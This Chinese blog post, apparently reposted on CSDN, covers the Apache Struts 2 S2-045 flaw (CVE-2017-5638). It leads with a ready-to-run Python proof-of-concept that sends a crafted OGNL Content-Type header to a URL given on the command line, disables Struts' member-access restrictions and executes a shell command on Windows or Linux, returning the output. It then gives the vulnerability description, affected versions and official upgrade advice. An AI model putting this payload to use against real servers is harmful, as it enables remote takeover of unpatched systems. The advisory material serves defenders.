ST2-045 For POC

转载请注明: 转载自Legend‘s BLog

本文链接地址: ST2-045 For POC

利用方法:

#! /usr/bin/env python
# encoding:utf-8
import urllib2
import sys
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers



def poc():
    register_openers()
    datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})
    header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
    header["Content-Type"]="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ifconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
    request = urllib2.Request(str(sys.argv[1]),datagen,headers=header)
    response = urllib2.urlopen(request)
    print response.read()




poc()

漏洞说明:

Apache Struts 2被曝存在远程命令执行漏洞,漏洞编号S2-045,CVE编号CVE-2017-5638,在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。

漏洞编号:

CVE-2017-5638

漏洞名称:

基于 Jakarta plugin插件的Struts远程代码执行漏洞

官方评级:

高危

漏洞描述

恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。

漏洞利用条件和方式:

黑客通过Jakarta 文件上传插件实现远程利用该漏洞执行代码。

  1. 基于Jakarta(Jakarta Multipart parser)插件的文件上传功能

  2. 恶意攻击者精心构造Content-Type的值

通过版本比对定位漏洞原因:

  1. \core\src\main\java\org\apache\struts2\dispatcher\multipart\MultiPartRequestWrapper.java
  2. core\src\main\java\org\apache\struts2\dispatcher\multipart\JakartaMultiPartRequest.java
  3. \core\src\main\java\org\apache\struts2\dispatcher\multipart\JakartaStreamMultiPartRequest.java
if  (LocalizedTextUtil.findText(this.getClass(), errorKey, defaultLocale, null,  new Object[0]) == null) {
    return LocalizedTextUtil.findText(this.getClass(),  “struts.messages.error.uploading”, defaultLocale, null, new  Object[] { e.getMessage() });
 } else {
    return  LocalizedTextUtil.findText(this.getClass(), errorKey, defaultLocale, null,  args);
}

漏洞影响范围:

Summary

Possible Remote Code Execution when performing file upload based on Jakarta Multipart parser.[td]

Who should read this All Struts 2 developers and users
Impact of vulnerability Possible RCE when performing file upload based on Jakarta Multipart parser
Maximum security rating High
Recommendation Upgrade to Struts 2.3.32 or Struts 2.5.10.1
Affected Software Struts 2.3.5 – Struts 2.3.31, Struts 2.5 – Struts 2.5.10
Reporter Nike Zheng
CVE Identifier CVE-2017-5638

Problem

It is possible to perform a RCE attack with a malicious Content-Type value. If the Content-Type value isn’t valid an exception is thrown which is then used to display an error message to a user.

Solution

If you are using Jakarta based file upload Multipart parser, upgrade to Apache Struts version 2.3.32 or 2.5.10.1. You can also switch to a different implementation of the Multipart parser.

Backward compatibility

No backward incompatibility issues are expected.

Workaround

Implement a Servlet filter which will validate Content-Type and throw away request with suspicious values not matching multipart/form-data.

展开阅读全文
©️2020 CSDN 皮肤主题: 黑客帝国 设计师: 上身试试 返回首页
实付0元
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值